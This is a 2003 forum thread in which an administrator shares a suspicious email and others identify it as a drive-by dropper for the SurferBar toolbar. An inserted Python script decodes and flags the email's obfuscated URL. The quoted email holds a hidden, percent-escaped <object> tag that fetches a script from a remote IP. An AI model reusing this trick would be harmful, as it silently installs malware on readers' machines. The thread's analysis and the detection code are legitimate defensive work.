Weird mail trying to get "a.cgi", any ideas?

Discussion in 'Computer Security' started by Maxime Ducharme, Sep 3, 2003.

  1. Hi,
    I received a suspicious email which seems to be an exploit
    of OE to infect people with a trojan or something like that.


    Here's what the email source looks like (I removed SMTP IPs & received
    headers):

    =================== BEGIN SOURCE =================
    Message-ID: <h54$-9mutb8--6@qw4.3uoi56>
    From: "Lorna Roach" <>
    Reply-To: "Lorna Roach" <>
    To: <>, <>
    Subject: Hey
    Date: Wed, 03 Sep 03 22:41:51 GMT
    X-Mailer: AOL 7.0 for Windows US sub 118
    MIME-Version: 1.0
    Content-Type: multipart/alternative;
    boundary="AF3E6...967056.7.08E03F7"
    X-Priority: 3
    X-MSMail-Priority: Normal
    X-Return-Path:


    --AF3E6...967056.7.08E03F7
    Content-Type: text/html;
    Content-Transfer-Encoding: quoted-printable

    <head>
    <div style=3D"display.none"><object data=3D"http://%363.2%346.=
    %3130.2%30%31%2F%63g%69%2D%62i%6E%2Fa%2E%63%67%69"></object></div>
    </head>
    <body>
    <p>Hey,</p>
    <p>How have you been?&nbsp; What have you been doing lately?</p>
    <p>Ive just been at home doing nothing :( bored at uni etc.</p>
    <p>Anyway's lets catch up soon,</p>
    <p>Luv,<br>You know who ;)</p>
    <p>&nbsp;</p>
    </body>
    </html>

    --AF3E6...967056.7.08E03F7--
    =================== END SOURCE =================


    This code tries to download this file :

    http://63.246.130.201/cgi-bin/a.cgi

    This host doesn't answer my pings and its TCP port 80 is stealthed.

    I didn't find anything on Google yet.

    Does someone recognize a virus in this, or am I targeted by someone?

    I do not like the fact that the email is targeted at 2 specific addresses
    of our organisation.

    Thanks for any reply

    ---------------------------------------------------------------
    Maxime Ducharme
    Network Administrator, Programmer
    Pandore-Design [http://www.pandore-design.com]
    Maxime Ducharme, Sep 3, 2003
    #1

  2. "Maxime Ducharme" <> wrote:

    I saw my first of these last night and have had a couple more reports
    this morning...

    > I received a suspicious email which seems to be an exploit
    > of OE to infect people with a trojan or something like that.


    Close, yes...

    > Here's how the email source look like (I removed SMTP IPs & received
    > headers):


    If you would not mind, I'd like to know the originating IP (or mail server).
    If you'd rather not post it publicly, please send it to me via Email.

    <<snip>>
    > <head>
    > <div style=3D"display.none"><object data=3D"http://%363.2%346.=
    > %3130.2%30%31%2F%63g%69%2D%62i%6E%2Fa%2E%63%67%69"></object></div>


    "URL escaped" encoding of a URL to a file called a.cgi which is a VBScript that
    drops a small .EXE (named drg.exe) and runs it. drg.exe is a "downloader" that
    pulls down a copy of the SurferBar IE toolbar and registers it via regsvr32.

    In turn the toolbar drops another .EXE (winsvr32.exe) into "c:\program files"
    (that path is hard-coded) and runs it. This .EXE is a "guardian" that runs a
    10-second sleep loop making sure that its own auto-start and two of SurferBar's
    registry configuration settings are present. The SurferBar toolbar also makes
    a large number of (pretty tastelessly named) shortcuts in your Start menu and
    in the "Programs" sub-menu thereunder...

    > This code tries to download this file :
    >
    > http://63.246.130.201/cgi-bin/a.cgi


    Yep -- that's what the above encoded URL decodes to...

    > This host doesnt answer my pings and his tcp port 80 is stealthed.


    Yes -- it does seem rather dead now, but last night I could d/l that file and
    the SurferBar toolbar .DLL the downloader is programmed to grab. The main
    surferbar.com site (63.246.130.200) was pretty sad -- all the links were to
    some other site (kanoodle.com ??) and were dead, much as www.surferbar.com
    seems to be now... (Hopefully this means the hosting company has closed
    surferbar.com down...)

    > I didnt find anything on Google yet.


    Try Google Groups and search for "surferbar". There were a couple of dozen hits
    going back 2 or 3 days last night.

    > Someone recognize a virus in this or I am targeted by someone ?


    AFAICT, it is not viral, but this "seed" Email seems to have been quite widely
    spammed.

    > I do not like the fact that the email is targeted at 2 specific address
    > of our organisation.


    Huh???

    > Thanks for any reply



    --
    Nick FitzGerald
    Nick FitzGerald, Sep 4, 2003
    #2
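Both the original post (which gives the decoded URL) and Nick's reply (which names the trick as "URL escaped" encoding) turn on the same point: the `data=` attribute of the hidden `<object>` is a plain URL whose hostname and path have been percent-escaped character by character so that a filter matching on `63.246.130.201` or `a.cgi` sees nothing. The script below is an added example, not code from any participant in this thread. It takes the quoted-printable HTML part exactly as quoted above (embedded here as a constructed sample), undoes the QP transfer encoding (the `=\n` soft line break and `=3D`), pulls out every `<object data=...>` URL, decodes it, and explains why the raw form is suspicious: a conforming encoder never percent-escapes a hostname, and never escapes unreserved characters (letters, digits, `-` `.` `_` `~`). The regex and the flagging heuristic are my own assumptions, not anything described in the posts.

```python
import re
import quopri
from urllib.parse import unquote, urlsplit

# Constructed sample: the HTML part quoted in the thread, still in its
# quoted-printable transfer encoding ("=\n" is a soft line break, "=3D" is "=").
SAMPLE_QP_HTML = (
    "<head>\n"
    '<div style=3D"display.none"><object data=3D"http://%363.2%346.=\n'
    '%3130.2%30%31%2F%63g%69%2D%62i%6E%2Fa%2E%63%67%69"></object></div>\n'
    "</head>\n"
)

# RFC 3986 "unreserved" set: a well-behaved encoder never percent-escapes these.
UNRESERVED = set(
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-._~"
)
# Assumed, deliberately loose matcher for <object ... data="..."> (case-insensitive).
OBJECT_DATA_RE = re.compile(r"""<object\b[^>]*\bdata\s*=\s*["']([^"']+)["']""", re.I)
PCT_RE = re.compile(r"%([0-9A-Fa-f]{2})")


def decode_qp(part: str) -> str:
    """Undo the quoted-printable transfer encoding of one MIME part."""
    return quopri.decodestring(part.encode("ascii")).decode("ascii")


def extract_object_urls(html: str) -> list:
    """Return the raw (still percent-escaped) data= URL of every <object>."""
    return OBJECT_DATA_RE.findall(html)


def obfuscation_reasons(raw_url: str) -> list:
    """List the reasons a URL looks obfuscated rather than merely encoded.

    Two tell-tales, both assumptions of this example, not rules from the thread:
    percent-escapes inside the authority (hostnames are never escaped), and
    percent-escapes that decode to unreserved characters (never needed).
    """
    reasons = []
    if "%" in urlsplit(raw_url).netloc:
        reasons.append("percent-escapes in hostname")
    escaped = {chr(int(h, 16)) for h in PCT_RE.findall(raw_url)}
    needless = escaped & UNRESERVED
    if needless:
        reasons.append("unreserved characters percent-escaped: "
                       + "".join(sorted(needless)))
    return reasons


def analyse(qp_part: str) -> list:
    """Decode one QP HTML part; return (raw_url, decoded_url, reasons) per <object>."""
    html = decode_qp(qp_part)
    return [(raw, unquote(raw), obfuscation_reasons(raw))
            for raw in extract_object_urls(html)]


if __name__ == "__main__":
    for raw, decoded, reasons in analyse(SAMPLE_QP_HTML):
        print("raw:    ", raw)
        print("decoded:", decoded)
        print("flags:  ", "; ".join(reasons) or "none")
```

Run against the sample, the decoded URL is the `http://63.246.130.201/cgi-bin/a.cgi` that Maxime gives, and both flags fire. Note that the first QP line ends in `=`, so the host is split across two physical lines in the raw message; any matcher that works on the undecoded body, line by line, never sees the complete string, which is one more reason to decode the transfer encoding before inspecting HTML mail.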

  3. Maxime Ducharme

    Elson Mat Guest

    Elson Mat, Sep 4, 2003
    #3
  4. Maxime Ducharme

    Lord Shaolin Guest

    Lord Shaolin, Sep 4, 2003
    #4
  5. Thanks Nick, Elson & Lord for your answers

    ---------------------------------------------------------------
    Maxime Ducharme
    Network Administrator, Programmer


    "Lord Shaolin" <abuse@127.0.0.1> wrote in message
    news:...
    > "Elson Mat" <it.a.sankyu.com.hk> wrote in message
    > news:bj66pm$...
    > > Try this info, symantec found it yesterday.
    > >
    > >

    >

    > > http://securityresponse.symantec.com/avcenter/venc/data/download.aduent.trojan.html
    > >
    > >

    >
    > And Spybot S&D has been able to remove it for a while, nasty thing that it
    > is.
    >
    > --
    >
    > -+ Shaolin +-
    > Discard what is useless, absorb what is not and
    > add what is uniquely your own.
    >
    > .: http://www.security-forums.com :.
    >
    >
    Maxime Ducharme, Sep 4, 2003
    #5
